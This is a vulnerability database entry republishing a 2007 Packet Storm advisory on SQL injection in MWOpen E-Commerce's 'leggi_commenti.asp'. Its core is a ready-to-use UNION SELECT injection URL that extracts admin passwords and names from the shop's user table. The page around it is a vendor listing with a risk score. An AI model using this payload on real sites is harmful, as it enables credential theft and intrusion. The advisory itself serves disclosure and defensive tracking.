Lucene search

mwopen-sql.txt

🗓️ 07 Dec 2007 00:00:00Reported by KiNgOfThEwOrLdType

packetstorm🔗 packetstormsecurity.com👁 25 Views

MWOpen E-Commerce SQL Injection in "leggi_commenti.asp" can compromise admin data access.

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`---------------------------------------------------------------  
____ __________ __ ____ __   
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_   
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\  
| | | \ | |/ \ \___| | /_____/ | || |   
|___|___| /\__| /______ /\___ >__| |___||__|   
\/\______| \/ \/   
---------------------------------------------------------------  
  
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org   
  
---------------------------------------------------------------  
  
MWOpen E-Commerce All Versions "leggi_commenti.asp" SQL Injection  
  
---------------------------------------------------------------  
  
#By KiNgOfThEwOrLd   
  
---------------------------------------------------------------  
  
PoC:  
  
Nothing to say..  
  
Corrupted Page:   
  
leggi_commenti.asp  
  
Corrupted Variabile:   
  
?id=  
  
Exploit:  
  
http://[target]/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null,  
null,password,nome,null,data,null+from+utenti+where+Admin=true  
  
---------------------------------------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

07 Dec 2007 00:00Current

7.4High risk

Vulners AI Score7.4